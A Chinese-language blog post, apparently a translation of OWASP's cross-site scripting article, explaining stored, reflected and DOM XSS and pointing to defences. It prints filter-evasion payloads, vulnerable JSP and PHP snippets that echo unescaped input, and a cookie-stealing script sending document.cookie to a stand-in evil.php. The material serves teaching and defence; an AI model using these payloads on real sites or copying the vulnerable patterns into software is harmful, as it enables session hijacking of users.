<!DOCTYPE html>
<html>
<head>
  <meta charset="utf-8">
  
  <title>Cross-site Scripting | Hexo</title>
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">
  <meta name="description" content="概述跨站脚本攻击（XSS）是一类注入，其恶意脚本被注入到可信的网站中。攻击者使用应用程序发送恶意代码，一般是在浏览器端脚本的表格中，给不同的终端用户的时候XSS攻击就发生了。缺陷使得这些攻击得逞非常普遍，并且发生在任何一处使用来自用户的输入和输出而有没有校验或编码它的web应用程序中。
攻击者可以利用XSS发送恶意脚本给信任的人。终端用户的浏览器没有办法了解到脚本是否该被信任，并且将会执行脚本。因">
<meta property="og:type" content="article">
<meta property="og:title" content="Cross-site Scripting">
<meta property="og:url" content="http://yoursite.com/2015/11/01/Cross-site-Scripting/index.html">
<meta property="og:site_name" content="Hexo">
<meta property="og:description" content="概述跨站脚本攻击（XSS）是一类注入，其恶意脚本被注入到可信的网站中。攻击者使用应用程序发送恶意代码，一般是在浏览器端脚本的表格中，给不同的终端用户的时候XSS攻击就发生了。缺陷使得这些攻击得逞非常普遍，并且发生在任何一处使用来自用户的输入和输出而有没有校验或编码它的web应用程序中。
攻击者可以利用XSS发送恶意脚本给信任的人。终端用户的浏览器没有办法了解到脚本是否该被信任，并且将会执行脚本。因">
<meta property="og:updated_time" content="2015-11-03T14:15:45.571Z">
<meta name="twitter:card" content="summary">
<meta name="twitter:title" content="Cross-site Scripting">
<meta name="twitter:description" content="概述跨站脚本攻击（XSS）是一类注入，其恶意脚本被注入到可信的网站中。攻击者使用应用程序发送恶意代码，一般是在浏览器端脚本的表格中，给不同的终端用户的时候XSS攻击就发生了。缺陷使得这些攻击得逞非常普遍，并且发生在任何一处使用来自用户的输入和输出而有没有校验或编码它的web应用程序中。
攻击者可以利用XSS发送恶意脚本给信任的人。终端用户的浏览器没有办法了解到脚本是否该被信任，并且将会执行脚本。因">
  
    <link rel="alternative" href="/atom.xml" title="Hexo" type="application/atom+xml">
  
  
    <link rel="icon" href="/favicon.png">
  
  <link href="//fonts.googleapis.com/css?family=Source+Code+Pro" rel="stylesheet" type="text/css">
  <link rel="stylesheet" href="/css/style.css" type="text/css">
  

</head>
<body>
  <div id="container">
    <div id="wrap">
      <header id="header">
  <div id="banner"></div>
  <div id="header-outer" class="outer">
    <div id="header-title" class="inner">
      <h1 id="logo-wrap">
        <a href="/" id="logo">Hexo</a>
      </h1>
      
    </div>
    <div id="header-inner" class="inner">
      <nav id="main-nav">
        <a id="main-nav-toggle" class="nav-icon"></a>
        
          <a class="main-nav-link" href="/">Home</a>
        
          <a class="main-nav-link" href="/archives">Archives</a>
        
      </nav>
      <nav id="sub-nav">
        
          <a id="nav-rss-link" class="nav-icon" href="/atom.xml" title="RSS Feed"></a>
        
        <a id="nav-search-btn" class="nav-icon" title="Search"></a>
      </nav>
      <div id="search-form-wrap">
        <form action="//google.com/search" method="get" accept-charset="UTF-8" class="search-form"><input type="search" name="q" results="0" class="search-form-input" placeholder="Search"><button type="submit" class="search-form-submit">&#xF002;</button><input type="hidden" name="sitesearch" value="http://yoursite.com"></form>
      </div>
    </div>
  </div>
</header>
      <div class="outer">
        <section id="main"><article id="post-Cross-site-Scripting" class="article article-type-post" itemscope itemprop="blogPost">
  <div class="article-meta">
    <a href="/2015/11/01/Cross-site-Scripting/" class="article-date">
  <time datetime="2015-11-01T09:22:01.000Z" itemprop="datePublished">2015-11-01</time>
</a>
    
  </div>
  <div class="article-inner">
    
    
      <header class="article-header">
        
  
    <h1 class="article-title" itemprop="name">
      Cross-site Scripting
    </h1>
  

      </header>
    
    <div class="article-entry" itemprop="articleBody">
      
        <h2 id="概述">概述</h2><p>跨站脚本攻击（XSS）是一类注入，其恶意脚本被注入到可信的网站中。攻击者使用应用程序发送恶意代码，一般是在浏览器端脚本的表格中，给不同的终端用户的时候XSS攻击就发生了。缺陷使得这些攻击得逞非常普遍，并且发生在任何一处使用来自用户的输入和输出而有没有校验或编码它的web应用程序中。</p>
<p>攻击者可以利用XSS发送恶意脚本给信任的人。终端用户的浏览器没有办法了解到脚本是否该被信任，并且将会执行脚本。因为它认为脚本来自于可信的源，恶意的脚本能够读取到任意cookies,session tokens,或者浏览器和被网站使用过的保留的敏感信息。这些脚本甚至能够重写HTML页面的内容。更多关于不同类型的XSS漏洞详情，看这里：<a href="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" target="_blank" rel="external">Types of Cross-Site Scripting</a></p>
<h2 id="相关的安全文章">相关的安全文章</h2><p><strong>如何避免跨站脚本漏洞</strong></p>
<p><a href="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting" target="_blank" rel="external">XSS (Cross Site Scripting) Prevention Cheat Sheet</a>_Prevention_Cheat_Sheet)</p>
<p><a href="https://www.owasp.org/index.php/DOM_based_XSS_Prevention_Cheat_Sheet" target="_blank" rel="external">DOM based XSS Prevention Cheat Sheet</a></p>
<p><a href="https://www.owasp.org/index.php/Phishing" target="_blank" rel="external">Phishing</a></p>
<p><a href="https://www.owasp.org/index.php/Data_Validation" target="_blank" rel="external">Data Validation</a></p>
<p><strong>如何审查代码的跨站脚本漏洞</strong></p>
<p><a href="https://www.owasp.org/index.php/Reviewing_Code_for_Cross-site_scripting" target="_blank" rel="external">Reviewing Code for Cross-site scripting</a></p>
<p><strong>如何测试跨站脚本漏洞</strong></p>
<p><a href="https://www.owasp.org/index.php/Testing_for_Reflected_Cross_site_scripting_(OWASP-DV-001" target="_blank" rel="external">Testing_for_Reflected_Cross_site<em>scripting</em>(OWASP-DV-001)</a>)</p>
<p><a href="https://www.owasp.org/index.php/Testing_for_Stored_Cross_site_scripting_(OWASP-DV-002" target="_blank" rel="external">Testing_for_Stored_Cross_site<em>scripting</em>(OWASP-DV-002)</a>)</p>
<p><a href="https://www.owasp.org/index.php/Testing_for_DOM-based_Cross_site_scripting_(OWASP-DV-003" target="_blank" rel="external">Testing_for_DOM-based_Cross_site<em>scripting</em>(OWASP-DV-003)</a>)</p>
<h2 id="描述">描述</h2><p>跨站脚本攻击（XSS）攻击发生在：</p>
<ol>
<li>数据通过不信任的源输入到应用程序，在web请求中更频繁。</li>
<li>数据包含动态的内容被送到web用户，没有经过恶意内容的校验。</li>
</ol>
<p>恶意的内容发送到浏览器经常包含一段js，也可能包含HTML，Flash，或任何浏览器可能执行的代码。大量基于XSS的攻击都是无限制的，但是他们通常包括传递隐私数据，像cookies或者其他session信息，对于攻击者来说，将受害者重定向到被攻击者控制的页面，或者存在漏洞的网站的幌子下在用户机器上执行恶意的操作</p>
<p><strong>存储和反射XSS攻击</strong></p>
<p>XSS攻击大致是能被分为两类：存储和反射。还有个第三类，没前两类那么有名的XSS攻击，被叫做DOM XSS。</p>
<p><strong>存储XSS攻击</strong></p>
<p>存储攻击是指注入的脚本被永久的存储在目标服务器，如数据库，消息论坛，访客日志，评论区域等。然后当受害者请求被存储的信息时候，获取到服务器的恶意脚本。存储XSS有时候也指持久或者Ⅰ类XSS。</p>
<p><strong>反射XSS攻击</strong></p>
<p>反射攻击是那些注入脚本被web服务器反弹，比如在错误消息，搜索结果，或者任何包含一些或所有输入作为部分请求被发送到服务器而返回。反射攻击通过其他路由传递给受害者，比如在一封邮件信息，或者一些其他的web网站。当一个用户被欺骗去点击一个恶意的链接，提交一个特殊构造的表单，或者甚至浏览一个恶意的网站，被注入的代码就传递到了有漏洞的网站，反射攻击返回到用户的浏览器。浏览器然后执行代码，因为它来自于一个被信任的服务器。反射XSS有些时候是值非持久或者Ⅱ类XSS。</p>
<p><strong>其他类的XSS漏洞</strong></p>
<p>除了存储和反射XSS，另外一类XSS，DOM XSS在2005年被Amit Klein提出。OWASP推荐在OWASP文章里描述的XSS分类：<a href="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" target="_blank" rel="external"> Types of Cross-Site Scripting</a>,覆盖了所有的XSS条目，并把他们组织成存储与反射XSS和服务端与客户端XSS，其中DOM XSS是客户端XSS的子集。</p>
<p><strong>XSS攻击后果</strong></p>
<p>XSS攻击后果是相同的无论是否是存储的还是反射的（或者基于DOM的）。差别在于载荷是怎么到达服务器的。不要错误的认为“只读”或者“brochureware”网站是不会受到严重的反射XSS攻击的。XSS能引起多种范围从一个烦恼程度到账户妥协的问题给终端用户。最严重的XSS攻击设计用户的会话cookie信息的披露，允许攻击者戒指用户会话并接管账户。其他有害的攻击包括披露终端用户文件，安装木马程序，重定向用户到一些其他页面和站点或者修改展示的内容。XSS漏洞允许攻击者修改新闻稿或新闻项目，这可能影响公司股票价格或使消费者丢失信心。在医药网站的XSS漏洞可能允许攻击者修改药量信息导致过计量。关于这类攻击详细信息，请参见<a href="https://www.owasp.org/index.php/Content_Spoofing" target="_blank" rel="external">Content_Spoofing</a></p>
<p><strong>如何保护你自己</strong></p>
<p>对XSS的主要防御在<a href="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting" target="_blank" rel="external">OWASP XSS Prevention Cheat Sheet</a>_Prevention_Cheat_Sheet)里已经描述了。</p>
<p>另外，你在所有支持HTTP TRACE的web服务器上关闭它是很重要的。攻击者能够通过javascript盗取cookie数据，尽管在客户端当<strong>document.cookie</strong>被禁用或不支持的时候。攻击在一个用户发表一段恶意脚本到论坛的时候被挂起，当另一个用户点击这个连接，一个从服务器收集用户cookie信息的异步HTTP 跟踪调用就被触发了，然后将它发送到另一个恶意服务器去收集cookie信息，因此攻击者能够进行session劫持攻击。这个通过在web服务器上移除HTTP TRACE很容易减少攻击。</p>
<p>OWASP的ESAPI项目已经产生了一套多种语言的可重复使用的安全组件，包括校验和转义程序以防止参数被篡改和XSS注入攻击。此外，OWASP的WebGoat培训项目应用有跨站脚本和数据编码的课程。</p>
<p><strong>XSS语法</strong></p>
<p><strong>XSS使用script属性</strong></p>
<p>XSS攻击可能不使用<strong><script></script></strong> 标签进行。其他标签也可以做相同的事情，比如：</p>
<pre><code>&lt;<span class="tag">body</span> onload=<span class="function"><span class="title">alert</span><span class="params">(<span class="string">'test1'</span>)</span></span>&gt;
</code></pre><p>或者其他属性像： <code>onmouseover, onerror</code></p>
<p><strong>onmouseover</strong></p>
<pre><code>&lt;<span class="tag">b</span> onmouseover=<span class="function"><span class="title">alert</span><span class="params">(<span class="string">'Wufff!'</span>)</span></span>&gt;click me!&lt;/b&gt;
</code></pre><p><strong>onerror</strong></p>
<pre><code><span class="tag">&lt;<span class="title">img</span> <span class="attribute">src</span>=<span class="value">"http://url.to.file.which/not.exist"</span> <span class="attribute">onerror</span>=<span class="value">alert(document.cookie);</span>&gt;</span>
</code></pre><p><strong>XSS 使用通过URI协议编码过的脚本</strong></p>
<p>如果我们需要对web应用过滤器隐藏攻击字符，可以编码字符串，比如说 <code>a=&amp;#X41</code> (UTF-8)和在IMG标签中使用：</p>
<pre><code>&lt;IMG SRC=j&amp;<span class="id">#X41vascript</span>:<span class="function"><span class="title">alert</span><span class="params">(<span class="string">'test2'</span>)</span></span>&gt;
</code></pre><p>更多不同的UTF-8编码方式给了我们更多的可能性。</p>
<p><strong>XSS使用编码代码</strong></p>
<p>我们可以用base64编码我们的脚本并放置在META标签内。这样我们可以完全摆脱 <code>alert()</code> 。更多关于该方法的信息在这里能找到<a href="https://tools.ietf.org/html/rfc2397" target="_blank" rel="external">RFC2397</a></p>
<pre><code><span class="tag">&lt;<span class="title">META</span> <span class="attribute">HTTP-EQUIV</span>=<span class="value">"refresh"</span> <span class="attribute">CONTENT</span>=<span class="value">"0;url=data:text/html;base64,PHNjcmlwdD5hbGVydCgndGVzdDMnKTwvc2NyaXB0Pg"</span>&gt;</span>
</code></pre><p>这些和其他例子在OWASP的一本真正的XSS语法攻击百科全书 <a href="https://www.owasp.org/index.php/XSS_Filter_Evasion_Cheat_Sheet" target="_blank" rel="external">XSS Filter Evasion Cheat Sheet</a>能被找到。</p>
<h2 id="实例">实例</h2><p>跨站脚本攻击可能发生在任何允许恶意用户发送不受限制的材料到一个被信任的web网站供有效的用户使用。</p>
<p>最常见的例子能在提供了基于web邮件列表样式功能的web网站的公告板被发现。</p>
<p><strong>实例1</strong></p>
<p>下面Jsp代码片段读取一个员工ID，eid，从HTTP请求到展示给用户。</p>
<pre><code><span class="xml"></span><span class="vbscript">&lt;% <span class="built_in">String</span> eid = <span class="built_in">request</span>.getParameter(<span class="string">"eid"</span>); %&gt;</span><span class="xml"> 
...
Employee ID: </span><span class="vbscript">&lt;%= eid %&gt;</span><span class="xml"></span>
</code></pre><p>如果eid仅包含标准的字母数字文本时，实例中的代码就操作正确的。如果eid有一个包含元字符或者源代码的值，然后代码就会被浏览器执行，正如他显示HTTP相应一样。</p>
<p>最初这个可能不会出现太大的漏洞，毕竟，为什么会有人输入URL能导致恶意代码运行在他自己的电脑上？真正的危险在于攻击者会创建恶意的URL。然后使用电子邮件或社会工程学手段来引诱受害者访问URL链接。当受害者点击链接，他们不知不觉将恶意内容通过易受攻击的web应用程序反射到他们自己的电脑。这种利用易受攻击的web应用程序的这种机制被称作反射XSS。</p>
<p><strong>实例2</strong></p>
<p>下面Jsp代码片段用给的ID去查数据库雇员，并且输出相应的雇员名称。</p>
<pre><code><span class="xml"></span><span class="vbscript">&lt;%... 
 Statement stmt = conn.createStatement();
 ResultSet rs = stmt.executeQuery(<span class="string">"select * from emp where id="</span>+eid);
 <span class="keyword">if</span> (rs != <span class="literal">null</span>) {
  rs.<span class="keyword">next</span>(); 
  <span class="built_in">String</span> name = rs.getString(<span class="string">"name"</span>);
%&gt;</span><span class="xml">

Employee Name: </span><span class="vbscript">&lt;%= name %&gt;</span><span class="xml"></span>
</code></pre><p>实例1中，当名称的值是合适的表现形式的时候，代码功能是正确的，否则，那么它将对阻止攻击毫无用处。再者，这个代码能表现的更小的危害，因为他是从数据库读取名称的值，他的内容显然是由应用程序管理的。然而，如果名称的值来自于用户提供的数据，那么数据库可能成了而已内容的渠道。数据库内对所有存储的数据没有合适的输入校验，攻击者能够在他的web浏览器执行恶意命令。这种类型的攻击，被称作存储XSS，他是特别隐蔽的，因为所引起的数据存储的间接性，使得更难识别威胁和增加了攻击影响到多个用户的可能性。XSS是从web网站提供的给访客的留言本上开始的，攻击者将在他们的留言上包含javascript，然后所有随后访客访问留言页面都将执行恶意的代码。<br>作为例子证明，XSS漏洞是有包含在HTTP响应的未经验证的数据代码引起的。这里有三个途径使XSS攻击能够到达受害者。</p>
<ul>
<li>实例1中，数据是直接从HTTP请求读取然后通过HTTP响应反射回来。反射XSS攻击发生在当攻击者造成一个用户提供危险内容给易受到攻击的web网站，然后反射回来给用户并被web浏览器执行。大多数常见的传送恶意内容的机制是把它作为参数包含在URL中，然后被发送或邮件直接给受害者。以这种方式构造URL成为了许多网络钓鱼骗局的核心，攻击者借此引诱受害者访问一个指向易受攻击的网站URL。当网站反射攻击者内容给用户后，内容将被执行并且继续传送隐私信息，如可能包含session信息的cookies，从用户机器传递给攻击者，或者执行其他恶意的行为。</li>
<li>实例2中，应用在数据库中存储了恶意的数据或者其他信任的数据。危险的数据随后被读取到应用程序，包括在动态内容中。存储XSS攻击发生在攻击者注入危险内容到数据中存储，过后再读取并包含在动态内容中。从攻击者的角度出发，注入而已内容的最佳位置是显示给许多用户或特别吸引用户的地方。感兴趣的用户在应用中通常具有提升权限或和对攻击者有价值的敏感数据交互。如果其中一个用户执行了恶意的内容，攻击者可能代表用户执行权限操作或者获得接触属于用户的敏感数据的权限。</li>
<li>应用程序存储危险数据在数据库或其他数据存储区，然后危险数据随后被作为新人的数据读取到应用程序中，被动态内容所包含。</li>
</ul>
<h3 id="攻击实例">攻击实例</h3><h4 id="实例1：cookie采集">实例1：cookie采集</h4><p>如果应用程序没有校验输入数据，攻击者可以很容易从一个已经认证的用户偷取cookie。所有的攻击者必须放置如下的代码在任何被发送的输入处（也就是：消息板，私信，用户个人资料）：</p>
<pre><code><span class="tag">&lt;<span class="title">SCRIPT</span> <span class="attribute">type</span>=<span class="value">"text/javascript"</span>&gt;</span><span class="javascript">
<span class="keyword">var</span> adr = <span class="string">'../evil.php?cakemonster='</span> + <span class="built_in">escape</span>(<span class="built_in">document</span>.cookie);
</span><span class="tag">&lt;/<span class="title">SCRIPT</span>&gt;</span>
</code></pre><p>上面的代码将传送cookie转义的内容（根据RFC内容在通过HTTP协议的GET方法发送内容前一定要转义）到evil.php脚本的<strong>cakemonster</strong>变量中。攻击者然后核对他的evil.php脚本的结果（cookie采集器一般会讲cookie写入到一个文件）并且使用它。</p>
<p>错误页面实例<br>让我们假设我们有一个错误页面，它包含一个不存在的页面的请求，经典的404错误页面。我们可能像下面实例一样的代码告知用户页面丢失的详情：</p>
<pre><code><span class="tag">&lt;<span class="title">html</span>&gt;</span>
<span class="tag">&lt;<span class="title">body</span>&gt;</span>

<span class="php"><span class="preprocessor">&lt;?</span> php
<span class="keyword">print</span> <span class="string">"Not found: "</span> . urldecode(<span class="variable">$_SERVER</span>[<span class="string">"REQUEST_URI"</span>]);
<span class="preprocessor">?&gt;</span></span>

<span class="tag">&lt;/<span class="title">body</span>&gt;</span>
<span class="tag">&lt;/<span class="title">html</span>&gt;</span>
</code></pre><p>让我们看如何工作的：</p>
<pre><code><span class="string">http:</span><span class="comment">//testsite.test/file_which_not_exist</span>
</code></pre><p>我们获得的响应：</p>
<pre><code><span class="literal">Not</span> found: /file_which_not_exist
</code></pre><p>现在我们尝试强制错误页面包含我们的代码：</p>
<pre><code>http://testsite.test/<span class="tag">&lt;<span class="title">script</span>&gt;</span><span class="actionscript">alert(<span class="string">"TEST"</span>);</span><span class="tag">&lt;/<span class="title">script</span>&gt;</span>
</code></pre><p>结果是：</p>
<pre><code>Not found: / (<span class="keyword">but</span> <span class="keyword">with</span> JavaScript code &lt;<span class="keyword">script</span>&gt;alert(<span class="string">"TEST"</span>);&lt;/<span class="keyword">script</span>&gt;)
</code></pre><p>我们已经成功注入了我们的XSS代码，什么意思？例如，我们能够使用这个缺陷去尝试盗取用户的session会话了。</p>
<h2 id="相关攻击">相关攻击</h2><ul>
<li><a href="https://www.owasp.org/index.php/XSS_Attacks" target="_blank" rel="external">XSS Attacks</a></li>
</ul>
<h2 id="相关漏洞">相关漏洞</h2><ul>
<li><a href="https://www.owasp.org/index.php/Types_of_Cross-Site_Scripting" target="_blank" rel="external">Types of Cross-Site Scripting</a></li>
<li><a href="https://www.owasp.org/index.php/Cross_Site_Scripting_Flaw" target="_blank" rel="external">Cross Site Scripting Flaw</a></li>
</ul>
<h2 id="相关控件">相关控件</h2><ul>
<li><a href="https://www.owasp.org/index.php/HTML_Entity_Encoding" target="_blank" rel="external">HTML Entity Encoding</a></li>
<li><a href="https://www.owasp.org/index.php/Category:Input_Validation" target="_blank" rel="external">Category:Input Validation</a></li>
</ul>
<h2 id="参考">参考</h2><ul>
<li><a href="https://www.owasp.org/index.php/XSS_(Cross_Site_Scripting" target="_blank" rel="external">XSS (Cross Site Scripting) Prevention Cheat Sheet</a>_Prevention_Cheat_Sheet)</li>
<li><a href="https://www.owasp.org/index.php/Data_Validation" target="_blank" rel="external">Data Validation</a></li>
</ul>

      
    </div>
    <footer class="article-footer">
      <a data-url="http://yoursite.com/2015/11/01/Cross-site-Scripting/" data-id="cigjgksnb0007kwqwfq0ll6sj" class="article-share-link">Share</a>
      
      
  <ul class="article-tag-list"><li class="article-tag-list-item"><a class="article-tag-list-link" href="/tags/XSS/">XSS</a></li></ul>

    </footer>
  </div>
  
    
<nav id="article-nav">
  
    <a href="/2015/11/02/Blind-SQL-Injection/" id="article-nav-newer" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Newer</strong>
      <div class="article-nav-title">
        
          Blind SQL Injection
        
      </div>
    </a>
  
  
    <a href="/2015/10/25/SQL-injection/" id="article-nav-older" class="article-nav-link-wrap">
      <strong class="article-nav-caption">Older</strong>
      <div class="article-nav-title">SQL injection</div>
    </a>
  
</nav>

  
</article>

</section>
        
          <aside id="sidebar">
  
    
  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tags</h3>
    <div class="widget">
      <ul class="tag-list"><li class="tag-list-item"><a class="tag-list-link" href="/tags/Blind-SQL-Injection/">Blind SQL Injection</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/XSS/">XSS</a><span class="tag-list-count">1</span></li><li class="tag-list-item"><a class="tag-list-link" href="/tags/sql-injection/">sql injection</a><span class="tag-list-count">1</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Tag Cloud</h3>
    <div class="widget tagcloud">
      <a href="/tags/Blind-SQL-Injection/" style="font-size: 10px;">Blind SQL Injection</a> <a href="/tags/XSS/" style="font-size: 10px;">XSS</a> <a href="/tags/sql-injection/" style="font-size: 10px;">sql injection</a>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Archives</h3>
    <div class="widget">
      <ul class="archive-list"><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/11/">November 2015</a><span class="archive-list-count">2</span></li><li class="archive-list-item"><a class="archive-list-link" href="/archives/2015/10/">October 2015</a><span class="archive-list-count">2</span></li></ul>
    </div>
  </div>

  
    
  <div class="widget-wrap">
    <h3 class="widget-title">Recents</h3>
    <div class="widget">
      <ul>
        
          <li>
            <a href="/2015/11/02/Blind-SQL-Injection/">Blind SQL Injection</a>
          </li>
        
          <li>
            <a href="/2015/11/01/Cross-site-Scripting/">Cross-site Scripting</a>
          </li>
        
          <li>
            <a href="/2015/10/25/SQL-injection/">SQL injection</a>
          </li>
        
          <li>
            <a href="/2015/10/25/hello-world/">Hello World</a>
          </li>
        
      </ul>
    </div>
  </div>

  
</aside>
        
      </div>
      <footer id="footer">
  
  <div class="outer">
    <div id="footer-info" class="inner">
      &copy; 2015 John Doe<br>
      Powered by <a href="http://hexo.io/" target="_blank">Hexo</a>
    </div>
  </div>
</footer>
    </div>
    <nav id="mobile-nav">
  
    <a href="/" class="mobile-nav-link">Home</a>
  
    <a href="/archives" class="mobile-nav-link">Archives</a>
  
</nav>
    

<script src="//ajax.googleapis.com/ajax/libs/jquery/2.0.3/jquery.min.js"></script>


  <link rel="stylesheet" href="/fancybox/jquery.fancybox.css" type="text/css">
  <script src="/fancybox/jquery.fancybox.pack.js" type="text/javascript"></script>


<script src="/js/script.js" type="text/javascript"></script>

  </div>
</body>
</html>